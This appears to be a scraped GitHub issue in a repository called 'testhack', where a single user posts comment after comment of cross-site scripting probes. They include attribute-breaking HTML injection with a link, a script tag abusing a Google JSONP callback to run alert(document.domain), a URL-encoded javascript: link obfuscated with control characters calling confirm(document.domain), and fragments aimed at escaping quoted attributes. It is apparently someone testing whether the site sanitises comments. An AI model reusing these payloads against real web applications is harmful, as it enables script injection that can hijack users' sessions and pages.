search

alish244 / github

testhack
1 stars 0 forks source link

"><h1>longin</h1> <h1><a href="https://alish244.github.io/hatestck/">Visit</a></h1><!-- #5

Open alish244 opened 1 month ago

alish244 commented 1 month ago

' vakzz=here

alish244 commented 1 month ago

alish244 commented 1 month ago

' data-design="1" data-issue="1" data-reference-type="design" data-original=" <script src='https://apis.google.com/complete/search?client=chrome&q=alert(document.domain);//&callback=setTimeout'>&lt;/script> "

alish244 commented 1 month ago 
    doc = load_html(html)
    options = @options.merge(css_string: CSSHelper.css_for_doc(doc))

    super(doc.to_s, options)
alish244 commented 1 month ago
alish244 commented 1 month ago

">

alish244 commented 1 month ago

%3Ca+href%3D%22%01java%03script%3Aconfirm%28document.domain%29%22%3EClick+to+execute%3Ca%3E%0D%0A

alish244 commented 1 month ago
alish244 commented 1 month ago

Uh oh...

alish244 commented 1 month ago

Escape SRC - onerror

alish244 commented 1 month ago

<div id="1

">

<a title="a

">yep

x">

<p x='